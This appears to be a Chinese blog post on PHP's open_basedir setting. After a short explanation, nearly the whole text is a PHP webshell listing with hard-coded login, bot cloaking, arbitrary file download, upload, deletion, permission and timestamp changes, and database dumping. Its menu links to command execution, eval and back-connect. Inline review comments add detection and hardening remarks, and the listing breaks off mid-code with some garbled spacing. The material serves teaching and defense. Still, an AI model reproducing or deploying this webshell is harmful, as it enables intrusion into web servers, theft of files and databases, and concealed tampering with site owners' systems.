PHP open_basedir 设置防止跨站

攻击者通过在网站上挂马(上传 PHP 木马文件)进入网站所在的目录后,如果 PHP 没有禁用 scandir 等目录函数,就可以从当前目录一级一级地向上层目录进入,浏览到网站目录之外的文件,此操作会造成很大的风险。设置 open_basedir 可以把 PHP 能访问的路径限制在指定目录内,从而阻止这种跨目录访问。

下面给出PHP的木马文件

<?php

 

//ini_set('display_errors',1);

 

// Runtime setup. Each call is prefixed with @, which silences any warning the call itself raises.
// 7 = E_ERROR | E_WARNING | E_PARSE.
@error_reporting(7);

 

@session_start();

 

// 0 removes PHP's execution time limit for this request.
@set_time_limit(0);

 

// NOTE(review): set_magic_quotes_runtime() was removed in PHP 7.0, so this listing
// targets PHP 5-era runtimes.
@set_magic_quotes_runtime(0);

 

// Cloaking: any request whose User-Agent contains "bot" (case-insensitive) is answered
// with a Not Found status header and nothing else. A site review that relies on a
// crawler-style client will therefore see this file as missing; check the file on disk
// rather than trusting the HTTP response.
if( strpos( strtolower($_SERVER['HTTP_USER_AGENT'] ), 'bot' ) !== false ) {

 

       // NOTE(review): the status line has no space between "1.0" and "404" as shown on
       // this page — possibly lost when the page was extracted.
       header('HTTP/1.0404 Not Found');

 

       exit;

 

}

 

// Buffer all output; the download branch later discards this buffer before streaming a file.
ob_start();

 

// microtime() returns "msec sec"; the two parts are summed into a start timestamp.
$mtime = explode(' ', microtime());

 

$starttime = $mtime[1] + $mtime[0];

 

// SA_ROOT: directory of this script, backslashes normalised to '/', with a trailing '/'.
define('SA_ROOT', str_replace('\\', '/',dirname(__FILE__)).'/');

 

// SELF: URL path of this script, used as the redirect target after login/logout.
define('SELF', $_SERVER['PHP_SELF'] ?$_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']);

 

define('IS_WIN', DIRECTORY_SEPARATOR =='\\');

 

// NOTE(review): get_magic_quotes_gpc() only exists on old PHP versions — confirm the target runtime.
define('IS_GPC', get_magic_quotes_gpc());

 

// The script reads the server's disable_functions setting to learn which functions the
// administrator has blocked. Here it only decides whether phpinfo() is usable.
$dis_func =get_cfg_var('disable_functions');

 

// eregi() is a case-insensitive POSIX regex match (removed in PHP 7.0).
define('IS_PHPINFO',(!eregi("phpinfo",$dis_func)) ? 1 : 0 );

 

 

 

// When magic quotes are on, $_POST is passed through s_array(), which is defined
// elsewhere in the file (presumably it strips the added slashes — not visible here).
if( IS_GPC ) {

 

       $_POST= s_array($_POST);

 

}

 

// All request input is moved from $_POST into $P and $_POST is destroyed; every later
// branch reads its parameters from $P. Because commands travel in POST bodies, they do
// not show up in access logs that record only the request line — body logging or a WAF
// is needed to see them.
$P = $_POST;

 

unset($_POST);

 

/*===================== Program configuration =====================*/

 

 

 

 

// Login secret, stored as a 32-hex-digit hash and compared against encode_pass() output
// further down (encode_pass() is defined elsewhere in the file). The hash is hard-coded
// and unsalted, so this literal is a stable string to search for when scanning a web
// root for copies of this file.
$pass = 'e10adc3949ba59abbe56e057f20f883e'; // the corresponding password is 123456

 

 

 

// If you have special requirements for the cookie scope, or login does not work, change the variables below; otherwise keep the defaults

 

// cookie prefix

 

$cookiepre = '';

 

// cookie domain

 

$cookiedomain = '';

 

// cookie path

 

$cookiepath = '/';

 

// cookie lifetime (86400 is one day if the unit is seconds — presumably consumed by scookie(); confirm)

 

$cookielife = 86400;

 

 

 

/*===================== End of configuration =====================*/

 

 

 

$charsetdb = array(

 

       'big5'                  => 'big5',

 

       'cp-866'              => 'cp866',

 

       'euc-jp'        => 'ujis',

 

       'euc-kr'        => 'euckr',

 

       'gbk'                   => 'gbk',

 

       'iso-8859-1'       => 'latin1',

 

       'koi8-r'        => 'koi8r',

 

       'koi8-u'       => 'koi8u',

 

       'utf-8'                 => 'utf8',

 

       'windows-1252' => 'latin1',

 

);

 

 

 

// Request dispatch fields, all taken from the POST body copied into $P.
// 'act' selects the branch to run; values tested on this page include 'login', 'Logout',
// 'phpinfo', 'down', 'file' and 'mysqladmin'.
$act = isset($P['act']) ? $P['act'] : '';

 

// Defaults to 'gbk' when the request does not supply a charset.
$charset = isset($P['charset']) ? $P['charset']: 'gbk';

 

$doing = isset($P['doing']) ? $P['doing'] :'';

 

 

 

// Creates $p1..$p4 through variable-variables from the POST fields p1..p4 (empty string
// when absent). These are the generic arguments of each action, e.g. $p1 is the file
// path for the 'down' branch.
for ($i=1;$i<=4;$i++) {

 

       ${'p'.$i}= isset($P['p'.$i]) ? $P['p'.$i] : '';

 

}

 

 

 

if (isset($charsetdb[$charset])) {

 

       header("content-Type:text/html; charset=".$charset);

 

}

 

 

 

$timestamp = time();

 

 

 

/* Authentication */
// Gate for everything below. scookie(), encode_pass() and loginpage() are defined
// elsewhere in the file; loginpage() presumably prints the login form and stops — confirm.

 

// Logout: overwrite the 'loginpass' cookie with an empty value and a negative lifetime,
// then redirect back to this script.
// NOTE(review): the menu on this page submits 'logout' (lower case) while this test is
// for "Logout"; PHP string comparison is case-sensitive.
if ($act == "Logout") {

 

       scookie('loginpass','', -86400 * 365);

 

       @header('Location:'.SELF);

 

       exit;

 

}

 

// An empty $pass disables the whole check.
if($pass) {

 

       if($act == 'login') {

 

              // Loose (==) comparison of the stored hash with the hash of the submitted password.
              if($pass == encode_pass($P['password'])) {

 

                     // The cookie value is the password hash itself, i.e. the same string
                     // as $pass. A 'loginpass' cookie carrying a 32-hex value is therefore
                     // a traffic indicator for this file, alongside the literal in the source.
                     scookie('loginpass',encode_pass($P['password']));

 

                     @header('Location:'.SELF);

 

                     exit;

 

              }

 

       }

 

       // Every other request must present a 'loginpass' cookie equal to $pass (loose !=).
       if(isset($_COOKIE['loginpass'])) {

 

              if($_COOKIE['loginpass'] != $pass) {

 

                     loginpage();

 

              }

 

       }else {

 

              loginpage();

 

       }

 

}

 

/* End of authentication */

 

 

 

$errmsg = '';

 

$uchar = '▲';

 

$dchar = '▼';

 

!$act && $act = 'file';

 

 

 

// current directory / set working directory / web root
// This is the step the article's introduction describes: the working directory is taken
// straight from the request, with no check that it stays under the script directory or
// the document root.

 

// Directory PHP started the request in.
$home_cwd = getcwd();

 

// chdir() to the POSTed 'cwd' if present, otherwise to the script's own directory.
// The return value is not checked. chdir() is subject to open_basedir, so with that
// directive set a path outside the allowed tree is refused and getcwd() below still
// reports the previous directory.
if (isset($P['cwd']) && $P['cwd']){

 

       chdir($P['cwd']);

 

} else {

 

       chdir(SA_ROOT);

 

}

 

$cwd = getcwd();

 

$web_cwd = $_SERVER['DOCUMENT_ROOT'];

 

// Normalise the three paths: on Windows convert backslashes to '/', and make sure each
// ends with '/'. $$k is a variable-variable naming $web_cwd, $cwd and $home_cwd in turn.
foreach (array('web_cwd','cwd','home_cwd')as $k) {

 

       if(IS_WIN) {

 

              $$k= str_replace('\\', '/', $$k);

 

       }

 

       if(substr($$k, -1) != '/') {

 

              $$k= $$k.'/';

 

       }

 

}

 

 

 

// 查看PHPINFO

 

if ($act == 'phpinfo') {

 

       if(IS_PHPINFO) {

 

              phpinfo();

 

              exit;

 

       }else {

 

              $errmsg= 'phpinfo() function has disabled';

 

       }

 

}

 

 

 

if(!function_exists('scandir')) {

 

       functionscandir($cwd) {

 

              $files= array();

 

              $dh= opendir($cwd);

 

              while($file = readdir($dh)) {

 

                     $files[]= $file;

 

              }

 

              return$files ? $files : 0;

 

       }

 

}

 

 

 

// 'down' action: stream a file back to the client as an attachment.
// $p1 is the request's p1 field (assigned earlier in the file). The only checks are
// is_file() and is_readable(), so any file the PHP process can read is eligible; the
// path is not limited to the web root. The file functions used here honour open_basedir,
// which is the server-side control that confines them.
if ($act == 'down') {

 

       if(is_file($p1) && is_readable($p1)) {

 

              // Drop whatever was buffered by ob_start() so only file bytes are sent.
              @ob_end_clean();

 

              $fileinfo= pathinfo($p1);

 

              if(function_exists('mime_content_type')) {

 

                     $type= @mime_content_type($p1);

 

                     header("Content-Type:".$type);

 

              }else {

 

                     // NOTE(review): pathinfo() returns no 'extension' key for names without a dot.
                     header('Content-type:application/x-'.$fileinfo['extension']);

 

              }

 

              // The file name is placed in the header unquoted.
              header('Content-Disposition:attachment; filename='.$fileinfo['basename']);

 

              // "%u" formats the size as an unsigned integer.
              header('Content-Length:'.sprintf("%u", @filesize($p1)));

 

              @readfile($p1);

 

              exit;

 

       }else {

 

              // On failure fall back to the file-manager view with an error message.
              $errmsg= 'Can\'t read file';

 

              $act= 'file';

 

       }

 

}

 

?>

 

<html>

 

<head>

 

<metahttp-equiv="Content-Type" content="text/html; charset=<?phpecho $charset;?>">

 

<title><?php echo $act.' -'.$_SERVER['HTTP_HOST'];?></title>

 

<style type="text/css">

 

body,td{font: 12pxArial,Tahoma;line-height: 16px;}

 

.input, select{font:12pxArial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}

 

.area{font:12px 'Courier New',Monospace;background:#fff;border: 1px solid #666;padding:2px;}

 

.red{color:#f00;}

 

.black{color:#000;}

 

.green{color:#090;}

 

.b{font-weight:bold;}

 

.bt{border-color:#b0b0b0;background:#3d3d3d;color:#fff;font:12px Arial,Tahoma;height:22px;}

 

a {color: #00f;text-decoration:none;}

 

a:hover{color:#f00;text-decoration:underline;}

 

.alt1 td{border-top:1px solid#fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;}

 

.alt2 td{border-top:1px solid #fff;border-bottom:1pxsolid #ddd;background:#f9f9f9;padding:5px 15px 5px 5px;}

 

.focus td{border-top:1px solid#fff;border-bottom:1px solid #ddd;background:#ffa;padding:5px 15px 5px 5px;}

 

.head td{border-top:1px solid#fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px5px;font-weight:bold;}

 

.head td span{font-weight:normal;}

 

.infolist {padding:10px;margin:10px 0 20px0;background:#F1F1F1;border:1px solid #ddd;}

 

form{margin:0;padding:0;}

 

h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}

 

ul.infoli{margin:0;color:#444;line-height:24px;height:24px;}

 

u{text-decoration:none;color:#777;float:left;display:block;width:150px;margin-right:10px;}

 

.drives{padding:5px;}

 

.drives span {margin:auto 7px;}

 

</style>

 

<scripttype="text/javascript">

 

function checkall(form) {

 

       for(vari=0;i<form.elements.length;i++) {

 

              vare = form.elements[i];

 

       if (e.type == 'checkbox') {

 

                     if(e.name != 'chkall' && e.name != 'saveasfile')

 

                            e.checked= form.chkall.checked;

 

              }

 

    }

 

}

 

function $(id) {

 

       returndocument.getElementById(id);

 

}

 

function createdir(){

 

       varnewdirname;

 

       newdirname= prompt('请输入目录名:', '');

 

       if(!newdirname) return;

 

       g(null,null,'createdir',newdirname);

 

}

 

function fileperm(pfile, val){

 

       varnewperm;

 

       newperm= prompt('当前 目录/文件:'+pfile+'\n请输入新的权限:', val);

 

       if(!newperm) return;

 

       g(null,null,'fileperm',pfile,newperm);

 

}

 

function rename(oldname){

 

       varnewfilename;

 

       newfilename= prompt('文件名:'+oldname+'\n请输入新的文件名:', '');

 

       if(!newfilename) return;

 

       g(null,null,'rename',newfilename,oldname);

 

}

 

function createfile(){

 

       varfilename;

 

       filename= prompt('请输入文件的名字:', '');

 

       if(!filename) return;

 

       g('editfile',null, null, filename);

 

}

 

function setdb(dbname) {

 

       if(!dbname)return;

 

       $('dbform').tablename.value='';

 

       $('dbform').doing.value='';

 

       if($('dbform').sql_query)

 

       {

 

              $('dbform').sql_query.value='';

 

       }

 

       $('dbform').submit();

 

}

 

function setsort(k) {

 

       $('dbform').order.value=k;

 

       $('dbform').submit();

 

}

 

function settable(tablename,doing) {

 

       if(!tablename)return;

 

       if(doing) {

 

              $('dbform').doing.value=doing;

 

       }else {

 

              $('dbform').doing.value='';

 

       }

 

       $('dbform').sql_query.value='';

 

       $('dbform').tablename.value=tablename;

 

       $('dbform').submit();

 

}

 

function s(act,cwd,p1,p2,p3,p4,charset) {

 

       if(act!= null) $('opform').act.value=act;

 

       if(cwd!= null) $('opform').cwd.value=cwd;

 

       if(p1!= null) $('opform').p1.value=p1;

 

       if(p2!= null) $('opform').p2.value=p2;

 

       if(p3!= null) $('opform').p3.value=p3;

 

       if(p4!= null) {$('opform').p4.value=p4;}else{$('opform').p4.value='';}

 

       if(charset!= null) $('opform').charset.value=charset;

 

}

 

function g(act,cwd,p1,p2,p3,p4,charset) {

 

       s(act,cwd,p1,p2,p3,p4,charset);

 

       $('opform').submit();

 

}

 

</script>

 

</head>

 

<bodystyle="margin:0;table-layout:fixed; word-break:break-all">

 

<?php

 

 

 

formhead(array('name'=>'opform'));

 

makehide('act', $act);

 

makehide('cwd', $cwd);

 

makehide('p1', $p1);

 

makehide('p2', $p2);

 

makehide('p3', $p3);

 

makehide('p4', $p4);

 

makehide('charset', $charset);

 

formfoot();

 

 

 

if(!function_exists('posix_getegid')) {

 

       $user= @get_current_user();

 

       $uid= @getmyuid();

 

       $gid= @getmygid();

 

       $group= "?";

 

} else {

 

       $uid= @posix_getpwuid(@posix_geteuid());

 

       $gid= @posix_getgrgid(@posix_getegid());

 

       $uid= $uid['uid'];

 

       $user= $uid['name'];

 

       $gid= $gid['gid'];

 

       $group= $gid['name'];

 

}

 

?>

 

<table width="100%"border="0" cellpadding="0" cellspacing="0">

 

       <trclass="head">

 

              <td><spanstyle="float:right;"><?php echo @php_uname();?> /User:<?php echo $uid.' ( '.$user.' ) / Group: '.$gid.' ( '.$group.')';?></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echogethostbyname($_SERVER['SERVER_NAME']);?>)</td>

 

       </tr>

 

       <trclass="alt1">

 

              <td>

 

                     <spanstyle="float:right;">编码:

 

                     <?php

 

              makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'onchange'=>'g(null,null,null,null,null,null,this.value);'));

 

                     ?>

 

                     </span>

 

                     <ahref="javascript:g('logout');">注销</a>|

 

                     <ahref="javascript:g('file',null,'','','','','<?php echo$charset;?>');">文件管理器</a> |

 

                     <ahref="javascript:g('mysqladmin',null,'','','','','<?php echo$charset;?>');">MYSQL管理</a> |

 

                     <ahref="javascript:g('shell',null,'','','','','<?php echo$charset;?>');">执行命令</a> |

 

                     <ahref="javascript:g('phpenv',null,'','','','','<?php echo$charset;?>');">PHP变量</a> |

 

                     <ahref="javascript:g('portscan',null,'','','','','<?php echo$charset;?>');">端口扫描</a> |

 

                     <ahref="javascript:g('secinfo',null,'','','','','<?php echo$charset;?>');">安全信息</a> |

 

                     <ahref="javascript:g('eval',null,'','','','','<?php echo$charset;?>');">Eval PHP代码</a>

 

                     <?phpif (!IS_WIN) {?> | <a href="javascript:g('backconnect',null,'','','','','<?phpecho $charset;?>');">Back Connect</a><?php }?>

 

              </td>

 

       </tr>

 

</table>

 

<table width="100%"border="0" cellpadding="15"cellspacing="0"><tr><td>

 

<?php

 

$errmsg && m($errmsg);

 

 

 

if ($act == 'file') {

 

 

 

       //判断当前目录可写情况

 

       $dir_writeable= @is_writable($cwd) ? 'Writable' : 'Non-writable';

 

       if(isset($p1)) {

 

              switch($p1){

 

                     case'createdir':

 

                            //创建目录

 

                            if($p2) {

 

                                   m('Directorycreated '.(@mkdir($cwd.$p2,0777) ? 'success' : 'failed'));

 

                            }

 

                            break;

 

                     case'uploadFile':

 

                            //上传文件

 

                            m('Fileupload '.(@move_uploaded_file($_FILES['uploadfile']['tmp_name'],$cwd.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));

 

                            break;

 

                     case'fileperm':

 

                            //编辑文件属性

 

                            if($p2 && $p3) {

 

                                   $p3= base_convert($p3, 8, 10);

 

                                   m('Setfile permissions '.(@chmod($p2, $p3) ? 'success' : 'failed'));

 

                            }

 

                            break;

 

                     case'rename':

 

                            //改名

 

                            if($p2 && $p3) {

 

                                   m($p3.'renamed '.$p2.(@rename($p3, $p2) ? ' success' : ' failed'));

 

                            }

 

                            break;

 

                     case'clonetime':

 

                            //克隆时间

 

                            if($p2 && $p3) {

 

                                   $time= @filemtime($p3);

 

                                   m('Setfile last modified '.(@touch($p2,$time,$time) ? 'success' : 'failed'));

 

                            }

 

                            break;

 

                     case'settime':

 

                            //自定义时间

 

                            if($p2 && $p3) {

 

                                   $time= strtotime($p3);

 

                                   m('Setfile last modified '.(@touch($p2,$time,$time) ? 'success' : 'failed'));

 

                            }

 

                            break;

 

                     case'delete':

 

                            //批量删除文件

 

                            if($P['dl']) {

 

                                   $succ= $fail = 0;

 

                                   foreach($P['dl'] as $f) {

 

                                          if(is_dir($cwd.$f)) {

 

                                                 if(@deltree($cwd.$f)) {

 

                                                        $succ++;

 

                                                 }else {

 

                                                        $fail++;

 

                                                 }

 

                                          }else {

 

                                                 if(@unlink($cwd.$f)) {

 

                                                        $succ++;

 

                                                 }else {

 

                                                        $fail++;

 

                                                 }

 

                                          }

 

                                   }

 

                                   m('Deletedfolder/file(s) have finished, choose '.count($P['dl']).', success '.$succ.',fail '.$fail);

 

                            }else {

 

                                   m('Pleaseselect folder/file(s)');

 

                            }

 

                            break;

 

                     case'paste':

 

                            if($_SESSION['do']== 'copy') {

 

                                   foreach($_SESSION['dl']as $f) {

 

                                          copy_paste($_SESSION['c'],$f,$cwd);                                  

 

                                   }

 

                            }elseif($_SESSION['do'] == 'move') {

 

                                   foreach($_SESSION['dl']as $f) {

 

                                          @rename($_SESSION['c'].$f,$cwd.$f);

 

                                   }

 

                            }

 

                            unset($_SESSION['do'],$_SESSION['dl'], $_SESSION['c']);

 

                            break;

 

                     default:

 

                            if($p1== 'copy' || $p1 == 'move') {

 

                                   if(isset($P['dl']) && count($P['dl'])) {

 

                                          $_SESSION['do']= $p1;

 

                                          $_SESSION['dl']= $P['dl'];

 

                                          $_SESSION['c']= $P['cwd'];

 

                                          m('Havebeen copied to the session');

 

                                   }else {

 

                                          m('Pleaseselect folder/file(s)');

 

                                   }

 

                            }

 

                            break;

 

              }

 

              echo"<scripttype=\"text/javascript\">$('opform').p1.value='';$('opform').p2.value='';</script>";

 

       }

 

       //操作完毕

 

       $free= @disk_free_space($cwd);

 

       !$free&& $free = 0;

 

       $all= @disk_total_space($cwd);

 

       !$all&& $all = 0;

 

       $used= $all-$free;

 

       p('<h2>文件管理器——当前的磁盘空间 '.sizecount($free).' of'.sizecount($all).' ('.@round(100/($all/$free),2).'%)</h2>');

 

 

 

       $cwd_links= '';

 

       $path= explode('/', $cwd);

 

       $n=count($path);

 

       for($i=0;$i<$n-1;$i++){

 

              $cwd_links.= '<a href="javascript:g(\'file\', \'';

 

              for($j=0;$j<=$i;$j++){

 

                     $cwd_links.= $path[$j].'/';

 

              }

 

              $cwd_links.= '\');">'.$path[$i].'/</a>';

 

       }

 

 

 

?>

 

<scripttype="text/javascript">

 

document.onclick = shownav;

 

function shownav(e){

 

       varsrc = e?e.target:event.srcElement;

 

       do{

 

              if(src.id=="jumpto") {

 

                     $('inputnav').style.display= "";

 

                     $('pathnav').style.display= "none";

 

                     return;

 

              }

 

              if(src.id=="inputnav") {

 

                     return;

 

              }

 

              src= src.parentNode;

 

       }while(src.parentNode)

 

 

 

       $('inputnav').style.display= "none";

 

       $('pathnav').style.display= "";

 

}

 

</script>

 

<div style="background:#eee;margin-bottom:10px;">

 

       <formοnsubmit="g('file',this.cwd.value);return false;"method="POST" id="godir" name="godir">

 

              <tableid="pathnav" width="100%" border="0"cellpadding="5" cellspacing="0">

 

                     <tr>

 

                            <tdwidth="100%"><?php echo $cwd_links.' - '.getChmod($cwd).' /'.PermsColor($cwd).getUser($cwd);?> (<?php echo$dir_writeable;?>)</td>

 

                            <tdnowrap><input class="bt" id="jumpto"name="jumpto" value="进入"type="button"></td>

 

                     </tr>

 

              </table>

 

              <tableid="inputnav" width="100%" border="0"cellpadding="5" cellspacing="0"style="display:none;">

 

                     <tr>

 

                            <tdnowrap>当前目录 (<?php echo $dir_writeable;?>,<?php echo getChmod($cwd);?>)</td>

 

                            <tdwidth="100%"><input class="input"name="cwd" value="<?php echo $cwd;?>"type="text" style="width:99%;margin:0 8px;"></td>

 

                            <tdnowrap><input class="bt" value="GO"type="submit"></td>

 

                     </tr>

 

              </table>

 

       </form>

 

<?php

 

       if(IS_WIN) {

 

              $comma= '';

 

              p('<divclass="drives">');

 

              foreach(range('A','Z') as $drive ) {

 

                     if(is_dir($drive.':/')) {

 

                            p($comma.'<ahref="javascript:g(\'file\',\''.$drive.':/\');">'.$drive.':\</a>');

 

                            $comma= '<span>|</span>';

 

                     }

 

              }

 

              p('</div>');

 

       }

 

?>

 

</div>

 

<?php

 

       p('<tablewidth="100%" border="0" cellpadding="4"cellspacing="0">');

 

       p('<trclass="alt1"><td colspan="6"style="padding:5px;line-height:20px;">');

 

       p('<formaction="'.SELF.'" method="POST"enctype="multipart/form-data"><divstyle="float:right;"><input name="uploadfile"value="" type="file" /> <input class="bt"value="上传" type="submit"/><input name="charset" value="'.$charset.'"type="hidden" /><input type="hidden"name="p1" value="uploadFile"><inputname="cwd" value="'.$cwd.'" type="hidden"/></div></form>');

 

       p('<ahref="javascript:g(\'file\',\''.str_replace('\\','/',$web_cwd).'\');">根目录</a>');

 

       p('| <a href="javascript:g(\'file\', \''.$home_cwd.'\');">程序目录</a>');

 

       p('| <ahref="javascript:g(\'file\',\''.$cwd.'\',null,null,null,\'dir\');">可写目录</a> ');

 

       p('| <a href="javascript:createdir();">新建目录</a> | <a href="javascript:createfile();">新建文件</a>');

 

       p('</td></tr>');

 

 

 

       $sort= array('filename', 1);

 

       if($p1){

 

              if(preg_match('!s_([A-z_]+)_(\d{1})!',$p1, $match)) {

 

                     $sort= array($match[1], (int)$match[2]);

 

              }

 

       }

 

 

 

       formhead(array('name'=>'flist'));

 

       makehide('act','file');

 

       makehide('p1','');

 

       makehide('cwd',$cwd);

 

       makehide('charset',$charset);

 

       p('<trclass="head">');

 

       p('<tdwidth="2%" nowrap><input name="chkall"value="on" type="checkbox"οnclick="checkall(this.form)" /></td>');

 

       p('<td><ahref="javascript:g(\'file\',null,\'s_filename_'.($sort[1]?0:1).'\');">文件名</a> '.($p1 == 's_filename_0' ? $dchar : '').($p1 == 's_filename_1'|| !$p1 ? $uchar : '').'</td>');

 

       p('<tdwidth="16%"><ahref="javascript:g(\'file\',null,\'s_mtime_'.($sort[1]?0:1).'\');">修改时间</a> '.($p1 == 's_mtime_0' ? $dchar : '').($p1 == 's_mtime_1'? $uchar : '').'</td>');

 

       p('<tdwidth="10%"><a href="javascript:g(\'file\',null,\'s_size_'.($sort[1]?0:1).'\');">大小</a> '.($p1 == 's_size_0' ? $dchar : '').($p1 == 's_size_1' ?$uchar : '').'</td>');

 

       p('<tdwidth="20%">权限 / 修改</td>');

 

       p('<tdwidth="22%">操作</td>');

 

       p('</tr>');

 

 

 

       //查看所有可写文件和目录

 

       $dirdata=$filedata=array();

 

 

 

       if($p4 == 'dir') {

 

              $dirdata= GetWDirList($cwd);

 

              $filedata= array();

 

       }else {

 

              //默认目录列表

 

              $dirs= @scandir($cwd);

 

              if($dirs) {

 

                     $dirs= array_diff($dirs, array('.'));

 

                     foreach($dirs as $file) {

 

                            $filepath=$cwd.$file;

 

                            if(@is_dir($filepath)){

 

                                   $dirdb['filename']=$file;

 

                                   $dirdb['mtime']=@date('Y-m-dH:i:s',filemtime($filepath));

 

                                   $dirdb['chmod']=getChmod($filepath);

 

                                   $dirdb['perm']=PermsColor($filepath);

 

                                   $dirdb['owner']=getUser($filepath);

 

                                   $dirdb['link']=$filepath;

 

                                   if($file=='..') {

 

                                          $dirdata['up']=1;

 

                                   }else {

 

                                          $dirdata[]=$dirdb;

 

                                   }

 

                            }else {

 

                                   $filedb['filename']=$file;

 

                                   //$filedb['size']=@filesize($filepath);

 

                                   $filedb['size']=sprintf("%u",@filesize($filepath));

 

                                   $filedb['mtime']=@date('Y-m-dH:i:s',filemtime($filepath));

 

                                   $filedb['chmod']=getChmod($filepath);

 

                                   $filedb['perm']=PermsColor($filepath);

 

                                   $filedb['owner']=getUser($filepath);

 

                                   $filedb['link']=$filepath;

 

                                   $filedata[]=$filedb;

 

                            }

 

                     }

 

                     unset($dirdb);

 

                     unset($filedb);

 

              }

 

       }

 

       $dir_i= '0';

 

       if(isset($dirdata['up'])) {

 

              $thisbg= bg();

 

              p('<trclass="'.$thisbg.'" οnmοuseοver="this.className=\'focus\';"οnmοuseοut="this.className=\''.$thisbg.'\';">');

 

              p('<tdalign="center">-</td><td nowrapcolspan="5"><ahref="javascript:g(\'file\',\''.getUpPath($cwd).'\');">ParentDirectory</a></td>');

 

              p('</tr>');

 

       }

 

       unset($dirdata['up']);

 

       usort($dirdata,'cmp');

 

       usort($filedata,'cmp');

 

       foreach($dirdataas $key => $dirdb){

 

              if($p1== 'getsize' && $p2 == $dirdb['filename']) {

 

                     $attachsize= dirsize($p2);

 

                     $attachsize= is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';

 

              }else {

 

                     $attachsize= '<a href="javascript:g(\'file\', null, \'getsize\',\''.$dirdb['filename'].'\');">查看大小</a>';

 

              }

 

              $thisbg= bg();

 

              p('<trclass="'.$thisbg.'" οnmοuseοver="this.className=\'focus\';"οnmοuseοut="this.className=\''.$thisbg.'\';">');

 

              p('<tdwidth="2%" nowrap><input name="dl[]"type="checkbox"value="'.$dirdb['filename'].'"></td>');

 

              p('<td><ahref="javascript:g(\'file\',\''.$dirdb['link'].'\')">'.$dirdb['filename'].'</a></td>');

 

              p('<tdnowrap><ahref="javascript:g(\'newtime\',null,\''.$dirdb['filename'].'\');">'.$dirdb['mtime'].'</a></td>');

 

              p('<tdnowrap>'.$attachsize.'</td>');

 

              p('<tdnowrap>');

 

              p('<ahref="javascript:fileperm(\''.$dirdb['filename'].'\',\''.$dirdb['chmod'].'\');">'.$dirdb['chmod'].'</a> / ');

 

              p('<ahref="javascript:fileperm(\''.$dirdb['filename'].'\',\''.$dirdb['chmod'].'\');">'.$dirdb['perm'].'</a>'.$dirdb['owner'].'</td>');

 

              p('<tdnowrap><ahref="javascript:rename(\''.$dirdb['filename'].'\');">重命名</a></td>');

 

              p('</tr>');

 

              $dir_i++;

 

       }

 

 

 

       p('<trbgcolor="#dddddd" stlye="border-top:1px solid#fff;border-bottom:1px solid #ddd;"><td colspan="6"height="5"></td></tr>');

 

       $file_i= '0';

 

 

 

       foreach($filedataas $key => $filedb){

 

              $fileurl= '/'.str_replace($web_cwd,'',$filedb['link']);

 

              $thisbg= bg();

 

              p('<trclass="'.$thisbg.'" οnmοuseοver="this.className=\'focus\';"οnmοuseοut="this.className=\''.$thisbg.'\';">');

 

              p('<tdwidth="2%" nowrap><input name="dl[]"type="checkbox"value="'.$filedb['filename'].'"></td>');

 

              p('<td>'.((strpos($filedb['link'],$web_cwd) !== false) ? '<a href="'.$fileurl.'"target="_blank">'.$filedb['filename'].'</a>' :$filedb['filename']).'</td>');

 

              p('<tdnowrap><ahref="javascript:g(\'newtime\',null,\''.$filedb['filename'].'\');">'.$filedb['mtime'].'</a></td>');

 

              p('<tdnowrap>'.sizecount($filedb['size']).'</td>');

 

              p('<tdnowrap>');

 

              p('<ahref="javascript:fileperm(\''.$filedb['filename'].'\',\''.$filedb['chmod'].'\');">'.$filedb['chmod'].'</a> / ');

 

              p('<ahref="javascript:fileperm(\''.$filedb['filename'].'\',\''.$filedb['chmod'].'\');">'.$filedb['perm'].'</a>'.$filedb['owner'].'</td>');

 

              p('<tdnowrap>');

 

              p('<ahref="javascript:g(\'down\',null,\''.$filedb['filename'].'\');">下载</a> | ');

 

              p('<ahref="javascript:g(\'editfile\',null,null,\''.$filedb['filename'].'\');">编辑</a> | ');

 

              p('<ahref="javascript:rename(\''.$filedb['filename'].'\');">重命名</a>');

 

              p('</td></tr>');

 

              $file_i++;

 

       }

 

       p('<trclass="'.bg().' head"><td colspan="5"><ahref="#"οnclick="$(\'flist\').p1.value=\'delete\';$(\'flist\').submit();">删除</a> | <a href="#"οnclick="$(\'flist\').p1.value=\'copy\';$(\'flist\').submit();">复制</a> | <a href="#"οnclick="$(\'flist\').p1.value=\'move\';$(\'flist\').submit();">移动</a>'.(isset($_SESSION['do']) &&@count($_SESSION['dl']) ? ' | <a href="#"οnclick="$(\'flist\').p1.value=\'paste\';$(\'flist\').submit();">Paste</a>': '').'</td><td align="right">'.$dir_i.' 目录 / '.$file_i.' 文件</td></tr>');

 

       p('</form></table>');

 

}// end dir

 

 

 

elseif ($act == 'mysqladmin') {

 

       $order= isset($P['order']) ? $P['order'] : '';

 

       $dbhost= isset($P['dbhost']) ? $P['dbhost'] : '';

 

       $dbuser= isset($P['dbuser']) ? $P['dbuser'] : '';

 

       $dbpass= isset($P['dbpass']) ? $P['dbpass'] : '';

 

       $dbname= isset($P['dbname']) ? $P['dbname'] : '';

 

       $tablename= isset($P['tablename']) ? $P['tablename'] : '';

 

 

 

       if($doing == 'dump') {

 

              if(isset($P['bak_table']) && $P['bak_table']) {

 

                     $DB= new DB_MySQL;

 

                     $DB->charsetdb= $charsetdb;

 

                     $DB->charset= $charset;

 

                     $DB->connect($dbhost,$dbuser, $dbpass, $dbname);

 

                     if($P['saveasfile'] && $P['bak_path']) {

 

                            $fp= @fopen($P['bak_path'],'w');

 

                            if($fp) {

 

                                   foreach($P['bak_table']as $k => $v) {

 

                                          if($v) {

 

                                                 $DB->sqldump($v,$fp);

 

                                          }

 

                                   }

 

                                   fclose($fp);                      

 

                                   $fileurl= str_replace(SA_ROOT,'',$P['bak_path']);

 

                                   m('Databasehas backup to <a href="'.$fileurl.'"target="_blank">'.$P['bak_path'].'</a>');

 

                            }else {

 

                                   m('Backupfailed');

 

                            }

 

                     }else {

 

                            @ob_end_clean();

 

                            $filename= basename($dbname.'.sql');

 

                            header('Content-type:application/unknown');

 

                            header('Content-Disposition:attachment; filename='.$filename);

 

